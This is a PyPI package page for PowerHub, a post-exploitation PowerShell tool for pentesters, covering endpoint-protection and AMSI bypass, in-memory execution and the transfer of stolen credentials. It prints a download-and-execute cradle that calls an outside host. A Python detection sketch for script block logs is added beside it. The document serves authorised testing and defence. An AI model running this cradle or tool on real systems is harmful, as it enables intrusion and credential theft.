PowerHub


Name: PowerHub
Version: 1.11.post1
home_page: https://github.com/AdrianVollmer/PowerHub
Summary: A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting
upload_time: 2023-02-07 17:02:20
maintainer:
docs_url: None
author: Adrian Vollmer
requires_python: >=3
license:
keywords:
VCS:
bugtrack_url:
requirements: cheroot, cryptography, Flask, Flask-SocketIO, flask-sqlalchemy, pyOpenSSL, pypykatz, python-magic, service_identity, sqlalchemy, twisted, watchdog, werkzeug, wsgidav
Travis-CI: No Travis.
coveralls test coverage: No coveralls.

PowerHub
========

PowerHub is a convenient post exploitation tool for PowerShell which aids a
pentester in transferring data, in particular code which may get flagged by
endpoint protection. Check out the
[Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/)! Features:

* Fileless
* Stateless
* Cert pinning
* String "obfuscation" by RC4 encryption
* Choose your AMSI Bypass
* Transparent aliases for in-memory execution of C# programs


![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-webapp.png)
![PowerHub Webapp](https://github.com/AdrianVollmer/PowerHub/blob/master/img/powerhub-sharphound.png)

During an engagement where you have a test client available, one of the
first things you want to do is run SharpHound, Seatbelt, PowerUp,
Invoke-PrivescCheck or PowerSploit. So you need to download the files,
mess with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can
also run arbitrary binaries (PE and shell code) entirely in-memory using
PowerSploit's modules, which is sometimes useful to bypass application
whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back
either as a file or a text snippet, via the command line or the web
interface. PowerHub also helps with collaboration in case you're a small
team.

Here is a simple example (grab information about local groups with PowerView
and transfer it back):

```powershell
PS C:\Users\avollmer> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
1.11                        written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\avollmer> Get-HubModule PowerView


Name   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1
Type   : ps1
N      : 205
Loaded : True
Alias  :

PS C:\Users\avollmer> Get-LocalGroup | PushTo-Hub -Name groups.json
```
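
A defender's view of the session above, as an added example that is not part of PowerHub or its README: the stager is a fetch-and-execute cradle, and PowerShell script block logging (event ID 4104) records its text. The sketch triages constructed log lines; the indicator names, verdict labels and the sample lines not taken from the README are assumptions of this example.

```python
import re

# Constructed script-block text, shaped like PowerShell script block logging
# (event ID 4104) would record it. The first and last entries mirror the
# README session; the others are made-up comparison cases.
SAMPLE_BLOCKS = [
    "$K=New-Object Net.WebClient;'a=reflection','t=http'|"
    "%{IEX $K.DownloadString('http://192.168.11.2:8080/0?'+$_)}",
    "Get-LocalGroup | ConvertTo-Json | Out-File groups.json",
    "Invoke-Expression (New-Object System.Net.WebClient)"
    ".DownloadString('https://intranet.example/setup.ps1')",
    "$wc=New-Object Net.WebClient;$wc.DownloadFile('http://updates.example/a.msi','a.msi')",
    "Get-LocalGroup | PushTo-Hub -Name groups.json",
]

INDICATORS = {
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "download_string": re.compile(r"\.DownloadString\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "cleartext_http": re.compile(r"['\"]http://", re.I),
    # Cmdlet names shown in the README session; a weak signal on their own.
    "powerhub_cmdlet": re.compile(r"\b(Get-HubModule|PushTo-Hub|Help-PowerHub)\b", re.I),
}

def indicators(block):
    """Names of all indicators that match one script block, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(block))

def classify(block):
    """Map one script block to 'alert', 'review' or 'ok'."""
    hits = set(indicators(block))
    # Remote text fetched and handed to IEX: code runs without touching disk.
    if {"download_string", "invoke_expression"} <= hits:
        return "alert"
    if "powerhub_cmdlet" in hits:
        return "alert"
    return "review" if hits else "ok"

def triage(blocks):
    """Return (verdict, indicator list) per block, in input order."""
    return [(classify(b), indicators(b)) for b in blocks]

if __name__ == "__main__":
    for verdict, hits in triage(SAMPLE_BLOCKS):
        print(f"{verdict:6} {', '.join(hits) or '-'}")
```

The pairing of a remote string fetch with `IEX` is the behaviour worth alerting on; the cmdlet-name and cleartext-HTTP matches are supporting context for the analyst.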


Installation
============

PowerHub can be installed like any other Python package. Just execute
`python3 -m pip install powerhub`. If you like to work with virtual
environments, I recommend [pipx](https://github.com/pypa/pipx/).

If you want to use the latest version on the dev branch, clone this
repository and install with `python3 -m pip install -e .`.

For building the payloads, you need the MinGW GCC and Mono C# compilers. On
Debian-like systems, you can install them with `apt-get install mono-mcs
gcc-mingw-w64-x86-64 gcc-mingw-w64-i686`.


Usage
=====

PowerHub has one mandatory argument: the callback host (can be an IP
address). You should also use `--auth <user>:<pass>`; otherwise, a randomly
generated password will be used for basic authentication. The switch
`--no-auth` disables basic authentication, which is *not recommended*. The
callback host name is used by the stager to download the payload. If the
callback port or path differs from the default, it can also be changed.

Read `powerhub --help` and the [Wiki](https://github.com/AdrianVollmer/PowerHub/wiki/Usage) for details.


Credits
=======

PowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,
p3nt4, @SkelSec. And of course, it would be nothing without @harmj0y,
@mattifestation and the many other contributors to
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).

Thanks!

Author
======

Adrian Vollmer, 2018-2022

Disclaimer
==========

Use at your own risk. Do not use without full consent of everyone involved.
For educational purposes only.

            

Raw data

{
    "_id": null,
    "home_page": "https://github.com/AdrianVollmer/PowerHub",
    "name": "PowerHub",
    "maintainer": "",
    "docs_url": null,
    "requires_python": ">=3",
    "maintainer_email": "",
    "keywords": "",
    "author": "Adrian Vollmer",
    "author_email": "",
    "download_url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
    "platform": null,
    "bugtrack_url": null,
    "license": "",
    "summary": "A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting",
    "version": "1.11.post1",
    "split_keywords": [],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "b2a11cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0",
                "md5": "64a3a54e543e268d0fb4d09711c85b34",
                "sha256": "bbab86f3ba2341f4d91d5a3c0966c9b8ed741b4845e68c5239aa3877972f11c1"
            },
            "downloads": -1,
            "filename": "PowerHub-1.11.post1.tar.gz",
            "has_sig": false,
            "md5_digest": "64a3a54e543e268d0fb4d09711c85b34",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3",
            "size": 814974,
            "upload_time": "2023-02-07T17:02:20",
            "upload_time_iso_8601": "2023-02-07T17:02:20.983491Z",
            "url": "https://files.pythonhosted.org/packages/b2/a1/1cf38ba90668af48f8eba9ee21650ae04eca17a2338e7325671fe79f47f0/PowerHub-1.11.post1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-02-07 17:02:20",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "github_user": "AdrianVollmer",
    "github_project": "PowerHub",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [
        {
            "name": "cheroot",
            "specs": []
        },
        {
            "name": "cryptography",
            "specs": []
        },
        {
            "name": "Flask",
            "specs": [
                [
                    ">=",
                    "1.0.2"
                ]
            ]
        },
        {
            "name": "Flask-SocketIO",
            "specs": [
                [
                    ">=",
                    "3.1.2"
                ]
            ]
        },
        {
            "name": "flask-sqlalchemy",
            "specs": [
                [
                    ">=",
                    "2.1"
                ],
                [
                    "<",
                    "3.0"
                ]
            ]
        },
        {
            "name": "pyOpenSSL",
            "specs": []
        },
        {
            "name": "pypykatz",
            "specs": [
                [
                    ">=",
                    "0.2.2"
                ]
            ]
        },
        {
            "name": "python-magic",
            "specs": []
        },
        {
            "name": "service_identity",
            "specs": []
        },
        {
            "name": "sqlalchemy",
            "specs": [
                [
                    "<",
                    "2.0"
                ]
            ]
        },
        {
            "name": "twisted",
            "specs": [
                [
                    ">=",
                    "18.9.0"
                ]
            ]
        },
        {
            "name": "watchdog",
            "specs": []
        },
        {
            "name": "werkzeug",
            "specs": [
                [
                    ">=",
                    "0.15"
                ]
            ]
        },
        {
            "name": "wsgidav",
            "specs": [
                [
                    ">=",
                    "3.0.0"
                ]
            ]
        }
    ],
    "tox": true,
    "lcname": "powerhub"
}
        